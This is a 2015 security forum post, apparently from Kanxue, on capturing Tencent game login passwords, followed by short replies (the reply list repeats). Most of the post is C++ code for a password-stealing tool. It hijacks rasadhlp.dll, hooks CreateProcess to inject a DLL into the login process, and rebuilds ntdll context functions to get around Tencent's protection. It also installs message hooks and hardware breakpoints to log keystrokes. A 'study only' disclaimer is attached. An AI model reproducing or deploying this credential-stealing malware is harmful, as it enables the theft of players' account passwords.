[原创]TX游戏登陆密码截取（详细,高清有码)-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]TX游戏登陆密码截取（详细,高清有码)

发表于: 2015-7-3 11:34 33231

[原创]TX游戏登陆密码截取（详细,高清有码)

anywhere杨

2015-7-3 11:34

33231

Ps:本文仅为学习研究结果(通用xp和win7)，私自用于任何商业活动造成的后果请自行承担

此文重点:
 1、劫持rasadhlp.dll实现对TSALogin.exe的完美注入.（不少朋友对怎么注入这个exe一直不懂)
2、安装消息勾子,判断当前输入焦点
3、自己构造ZwSetContextThread,和ZwGetContextThread
4、设置硬件断点，监视键盘输入，保存未加密虚键码和加密虚键码
5、实现解密


unsigned int  WINAPI _WorkThread(void * lpPram)
{
	TCHAR tcWorkDll[MAX_PATH];
	GetModuleFileName(nullptr,g_tcExeDir,MAX_PATH);
	*( _tcsrchr(g_tcExeDir,'\\') +1 )=0;
	_stprintf_s(tcWorkDll,_T("%s%s"),g_tcExeDir,_T("tencent_Login.dll"));
	hTestModule=LoadLibrary(tcWorkDll);
	return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	if (ul_reason_for_call == DLL_PROCESS_ATTACH)
	{//我最后测试是tgp。但是发现tgp没加密，其实游戏都是加密的，如jfzr,fifa3等
		if(IsSpecifyProcessName(_T("tgp_daemon.exe")))
		{
			hWorkThread=(HANDLE)_beginthreadex(NULL,NULL,_WorkThread,NULL,NULL,NULL);
		}
		using namespace AheadLib;
		return Load();
	}
	else if (ul_reason_for_call == DLL_PROCESS_DETACH)
	{
		using namespace AheadLib;
		Free();
	}
	return TRUE;
}


BOOL WINAPI myCreateProcess(LPCWSTR lpApplicationName,LPWSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,
	BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCWSTR lpCurrentDirectory,LPSTARTUPINFOW lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation
	)
{
	BOOL bRet =FALSE;
	CHAR tcText[MAX_PATH];
	if( _tcsstr(lpCommandLine,_T("TASLogin.exe")) )
	{
		GetModuleFileNameA(g_hMod,tcText,MAX_PATH);
		return DetourCreateProcessWithDll(lpApplicationName,lpCommandLine,lpProcessAttributes,lpThreadAttributes,
			bInheritHandles,dwCreationFlags,lpEnvironment,lpCurrentDirectory,lpStartupInfo,lpProcessInformation,tcText,RealCreateProcess);
	}
	return RealCreateProcess(lpApplicationName,lpCommandLine,lpProcessAttributes,lpThreadAttributes,
		bInheritHandles,dwCreationFlags,lpEnvironment,lpCurrentDirectory,lpStartupInfo,lpProcessInformation);
}

void StartWork()
{
	
	DetourTransactionBegin();
	DetourUpdateThread(GetCurrentThread());

	TCHAR tcText[100];
	TCHAR  lpProcessName[50]={0} ;
	_tcscpy_s(lpProcessName, GetCurProcessName().c_str());

	if( !_tcsicmp ( lpProcessName,_T("tgp_daemon.exe")) )
	{
		DetourAttach((PVOID*)&RealCreateProcess,myCreateProcess);  //HOOK CreateProcess,实现完美注入TSALogin.exe
	}
	if( !_tcsicmp ( lpProcessName,_T("TASLogin.exe")) )
	{
		DWORD dwOldProtect;
		//自己构造  ZwSetContextThread ZwGetContextThread,因为等会这2个函数会被TX hook，所以我们先构造一份自己的
		ZwSetContextThread=(fnZwSetContextThread)GetProcAddress(GetModuleHandle(_T("ntdll")),"ZwSetContextThread");
		ZwGetContextThread=(fnZwGetContextThread)GetProcAddress(GetModuleHandle(_T("ntdll")),"ZwGetContextThread");
		ReadProcessMemory((HANDLE)-1,(VOID*)ZwSetContextThread,g_ZwSetContextThreadZone,5,nullptr);
		ReadProcessMemory((HANDLE)-1,(VOID*)ZwGetContextThread,g_ZwGetContextThreadZone,5,nullptr);

		VirtualProtect(g_ZwSetContextThreadZone,10,PAGE_EXECUTE_READWRITE,&dwOldProtect);
		VirtualProtect(g_ZwGetContextThreadZone,10,PAGE_EXECUTE_READWRITE,&dwOldProtect);

		*(BYTE*)(g_ZwGetContextThreadZone+5)=0xE9;
		*(BYTE*)(g_ZwSetContextThreadZone+5)=0xE9;
		*(DWORD*)( g_ZwGetContextThreadZone+6)= (DWORD)ZwGetContextThread - (DWORD)g_ZwGetContextThreadZone -5;
		*(DWORD*)( g_ZwSetContextThreadZone+6 )=(DWORD)ZwSetContextThread  -(DWORD)g_ZwSetContextThreadZone -5;

		/*_stprintf_s(tcText,_T("g_ZwGetContextThreadZone = 0x%x,g_ZwSetContextThreadZone =0x%x"),g_ZwGetContextThreadZone,g_ZwSetContextThreadZone);
		OutputDebugString(tcText);*/

		//Hook RtlDispatchException
		ProcessDispatchException(); //设置硬件断点，监视键盘输入

		g_hHookId=SetWindowsHookEx(WH_GETMESSAGE,GetMsgProc,g_hMod,GetCurrentThreadId());
		OutputDebugString(_T("TSALogin.exe注入成功"));
	}
	DetourTransactionCommit();
}

extern void StartWork();
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		g_hMod=hModule;
		StartWork();
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

上传的附件：

劫持dll代码生成工具.zip （36.47kb，452次下载）
tencent_Login.rar （118.85kb，397次下载）
rasadhlp.rar （6.13kb，367次下载）

收藏・106

免费・3

支持

最新回复 (74) 1 2 3 ▶
watchsky 雪币： 2620 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 42 粉丝 0 关注私信	watchsky 2 楼占个位置 2015-7-3 12:16 0
white、、雪币： 60 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 387 粉丝 0 关注私信	white、、 3 楼给赞给谢，加支持. 2015-7-3 12:20 0
轩辕之风雪币： 2291 活跃值： (938) 能力值： ( LV8，RANK：130 ) 在线值：发帖 34 回帖 322 粉丝 67 关注私信	轩辕之风 1 4 楼帮楼主顶一下！ 2015-7-3 12:24 0
yypEx 雪币： 459 活跃值： (166) 能力值： ( LV9，RANK：165 ) 在线值：发帖 16 回帖 72 粉丝 2 关注私信	yypEx 5 楼感谢分享，前排占位 2015-7-3 12:30 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 6 楼多谢。。。 2015-7-3 12:36 0
bnsn 雪币： 38 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	bnsn 7 楼你这个简历明显写得不好 2015-7-3 12:39 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 8 楼随便写写。总要大概先合适呗。这本来就是附带的。 2015-7-3 13:03 0
hksuper 雪币： 256 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	hksuper 9 楼赞学习一下 2015-7-3 13:07 0
地狱怪客雪币： 341 活跃值： (143) 能力值： ( LV7，RANK：110 ) 在线值：发帖 23 回帖 1125 粉丝 10 关注私信	地狱怪客 2 10 楼肯定会找到好工作 2015-7-3 14:04 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 11 楼多谢吉言哦 2015-7-3 14:21 0
atompure 雪币： 20897 活跃值： (4095) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 261 粉丝 0 关注私信	atompure 12 楼谢谢分享！ 2015-7-3 16:43 0
LOVEZ 雪币： 76 活跃值： (206) 能力值： ( LV2，RANK：15 ) 在线值：发帖 1 回帖 135 粉丝 0 关注私信	LOVEZ 13 楼帮楼主顶一下！ 2015-7-3 16:46 0
忧悠雪币： 79 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 7 粉丝 0 关注私信	忧悠 14 楼帮楼主顶一下哦~ 2015-7-3 16:56 0
Larpx 雪币： 5 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	Larpx 15 楼赞，学习一下 2015-7-3 17:40 0
奉先之灵雪币： 52 活跃值： (34) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 32 粉丝 0 关注私信	奉先之灵 16 楼顶一下楼主1 2015-7-3 18:10 0
zhuangbx 雪币： 289 活跃值： (77) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 78 粉丝 0 关注私信	zhuangbx 17 楼帮顶,学习一下 2015-7-3 19:26 0
我爱菜菜雪币： 235 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 15 粉丝 0 关注私信	我爱菜菜 18 楼学习学习 2015-7-3 23:54 0
无名侠雪币： 6911 活跃值： (9069) 能力值： ( LV17，RANK：797 ) 在线值：发帖 74 回帖 406 粉丝 583 关注私信	无名侠 12 19 楼厉害啊！ 2015-7-4 00:01 0
逗比系恶魔雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	逗比系恶魔 20 楼帮楼主顶一下 2015-7-4 00:27 0
viphack 雪币： 219 活跃值： (783) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 21 楼 6666 支持一下，顺便撸主一定会找到好工作的 2015-7-4 02:09 0
VeryCool 雪币： 409 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	VeryCool 22 楼占个位置 2015-7-4 07:05 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 23 楼 mark一下谢谢 2015-7-4 08:44 0
h辉雪币： 101 活跃值： (29) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 118 粉丝 0 关注私信	h辉 24 楼 up.... 2015-7-4 09:46 0
cxqwe 雪币： 208 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 10 粉丝 0 关注私信	cxqwe 25 楼感谢分享，学习一下 2015-7-4 10:25 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

anywhere杨

发帖

423

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (74) 1 2 3 ▶
watchsky 雪币： 2620 活跃值： (55) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 42 粉丝 0 关注私信	watchsky 2 楼占个位置 2015-7-3 12:16 0
white、、雪币： 60 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 387 粉丝 0 关注私信	white、、 3 楼给赞给谢，加支持. 2015-7-3 12:20 0
轩辕之风雪币： 2291 活跃值： (938) 能力值： ( LV8，RANK：130 ) 在线值：发帖 34 回帖 322 粉丝 67 关注私信	轩辕之风 1 4 楼帮楼主顶一下！ 2015-7-3 12:24 0
yypEx 雪币： 459 活跃值： (166) 能力值： ( LV9，RANK：165 ) 在线值：发帖 16 回帖 72 粉丝 2 关注私信	yypEx 5 楼感谢分享，前排占位 2015-7-3 12:30 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 6 楼多谢。。。 2015-7-3 12:36 0
bnsn 雪币： 38 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	bnsn 7 楼你这个简历明显写得不好 2015-7-3 12:39 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 8 楼随便写写。总要大概先合适呗。这本来就是附带的。 2015-7-3 13:03 0
hksuper 雪币： 256 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	hksuper 9 楼赞学习一下 2015-7-3 13:07 0
地狱怪客雪币： 341 活跃值： (143) 能力值： ( LV7，RANK：110 ) 在线值：发帖 23 回帖 1125 粉丝 10 关注私信	地狱怪客 2 10 楼肯定会找到好工作 2015-7-3 14:04 0
anywhere杨雪币： 110 活跃值： (527) 能力值： ( LV4，RANK：40 ) 在线值：发帖 56 回帖 423 粉丝 3 关注私信	anywhere杨 11 楼多谢吉言哦 2015-7-3 14:21 0
atompure 雪币： 20897 活跃值： (4095) 能力值： ( LV3，RANK：20 ) 在线值：发帖 6 回帖 261 粉丝 0 关注私信	atompure 12 楼谢谢分享！ 2015-7-3 16:43 0
LOVEZ 雪币： 76 活跃值： (206) 能力值： ( LV2，RANK：15 ) 在线值：发帖 1 回帖 135 粉丝 0 关注私信	LOVEZ 13 楼帮楼主顶一下！ 2015-7-3 16:46 0
忧悠雪币： 79 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 7 粉丝 0 关注私信	忧悠 14 楼帮楼主顶一下哦~ 2015-7-3 16:56 0
Larpx 雪币： 5 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	Larpx 15 楼赞，学习一下 2015-7-3 17:40 0
奉先之灵雪币： 52 活跃值： (34) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 32 粉丝 0 关注私信	奉先之灵 16 楼顶一下楼主1 2015-7-3 18:10 0
zhuangbx 雪币： 289 活跃值： (77) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 78 粉丝 0 关注私信	zhuangbx 17 楼帮顶,学习一下 2015-7-3 19:26 0
我爱菜菜雪币： 235 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 15 粉丝 0 关注私信	我爱菜菜 18 楼学习学习 2015-7-3 23:54 0
无名侠雪币： 6911 活跃值： (9069) 能力值： ( LV17，RANK：797 ) 在线值：发帖 74 回帖 406 粉丝 583 关注私信	无名侠 12 19 楼厉害啊！ 2015-7-4 00:01 0
逗比系恶魔雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	逗比系恶魔 20 楼帮楼主顶一下 2015-7-4 00:27 0
viphack 雪币： 219 活跃值： (783) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 21 楼 6666 支持一下，顺便撸主一定会找到好工作的 2015-7-4 02:09 0
VeryCool 雪币： 409 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 13 粉丝 0 关注私信	VeryCool 22 楼占个位置 2015-7-4 07:05 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 23 楼 mark一下谢谢 2015-7-4 08:44 0
h辉雪币： 101 活跃值： (29) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 118 粉丝 0 关注私信	h辉 24 楼 up.... 2015-7-4 09:46 0
cxqwe 雪币： 208 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 10 粉丝 0 关注私信	cxqwe 25 楼感谢分享，学习一下 2015-7-4 10:25 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复